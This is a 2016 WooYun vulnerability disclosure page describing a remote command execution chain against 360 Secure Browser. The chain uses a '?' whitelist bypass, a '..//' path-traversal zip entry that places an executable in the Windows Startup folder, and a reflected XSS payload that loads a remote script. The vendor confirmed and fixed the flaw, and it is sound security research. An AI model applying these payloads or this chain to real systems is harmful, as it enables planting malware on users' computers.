当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0178241

漏洞标题:360安全浏览器远程命令执行漏洞接力赛第四棒

相关厂商:奇虎360

漏洞作者: 唐朝实验室

提交时间:2016-02-24 12:23

修复时间:2016-05-28 16:30

公开时间:2016-05-28 16:30

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-24: 细节已通知厂商并且等待厂商处理中
2016-02-28: 厂商已经确认,细节仅向厂商公开
2016-04-23: 细节向核心白帽子及相关领域专家公开
2016-05-03: 细节向普通白帽子公开
2016-05-13: 细节向实习白帽子公开
2016-05-28: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

这只是对『心伤的胖子』接力的回应。仍旧是技术分享,其他的留给评论。
浏览器版本:8.1.1.131

详细说明:

是的,这是对之前漏洞的 http://**.**.**.**/bugs/wooyun-2010-0170984 绕过,之前漏洞有两个关键点:
1. 利用 / 符号绕过了 360 白名单的限制;
2. 利用 ../ 跳转把恶意文件放置到当前用户的启动目录;
360 在随后的版本中做了修复,所以在最新的 **.**.**.** 版本中漏洞肯定是不存在的。
经过测试,发现 360 修复的方案为:
1. 不允许域名中出现 / 符号,但是还是会允许别的特殊符号;
2. 通过 ../ 无法跳转目录放置恶意程序到指定目录;
具体怎么绕过?下面就是见证奇迹的时刻:
和 / 有异曲同工的符号是 ?,所以我们的插件链接是:

**.**.**.**?.**.**.**.**/poc.zip


会被浏览器识别为:

**.**.**.**/?.**.**.**.**/poc.zip


这样我们绕过第一个条件的限制,成功让浏览器下载我们指定的插件。
虽然新版本中浏览器限制通过 ../ 跳转到指定目录,但是经过测试发现却可以使用 ..// 来跳转到指定目录,是不是很神奇?所以我们 poc.zip 文件中只需要包含文件名为如下的文件即可在安装插件的同时把我们的文件放置到当前用户的启动目录

//..//..//..//..//..//Microsoft//Windows//Start Menu//Programs//Startup//funny.exe


btw:这个地方的逻辑我真是没懂。
这两个关键的点已经解决了,还有一些小的问题困扰着我们
1. 新版本浏览器修复了任意域名下都能够调用 external api 的漏洞
2. 只允许部分 **.**.**.** 的域名才能够调用 external api
也就是我们必须找一个允许调用 external api 的 **.**.**.** 域下的 XSS 漏洞,其实我们有一个:

http://m.cp.**.**.**.**/kaijiang/tdetail/?lotid=220051&issue=<script>alert(1);</script>


但是 m.cp.**.**.**.** 域并没有调用 external api 的权限,但是 cp.**.**.**.** 域名却有权限,所以我们可以这样:
1. 用 m.cp.**.**.**.** 域下的 XSS 执行 JS 代码,做两件事情:设置 document.domain 为:**.**.**.**,然后创建一个 iframe,加载一个同样设置 document.domain 为 **.**.**.** 的 cp.**.**.**.** 的页面;
2. 然后跨域在 cp.**.**.**.** 域名下执行 JS 代码,通过上面的漏洞达到远程命令执行的效果;
幸运的是我们在 cp.**.**.**.** 域名下找到一个 document.domain 设置为 **.**.**.** 的页面:

http://cp.**.**.**.**/help/hemai.html


所以我们的代码是:

http://m.cp.**.**.**.**/kaijiang/tdetail/?lotid=220051&issue=<img%20src%3Da%20onerror%3D$.getScript("**.**.**.**/poc.js")> 
poc.js 见测试代码


漏洞证明:

视频:http://**.**.**.**/wooyun/upload/201602/360_security_browser_rce_3.mov

修复方案:

1. 检测 ? 符号;
2. ..// 的逻辑也需要做下处理;

版权声明:转载请注明来源 唐朝实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-02-28 16:28

厂商回复:

感谢白帽子提交的报告,我们第一时间通知业务部门修复了该问题并发布了新版本全网推送升级。

最新状态:

2016-04-19:已修复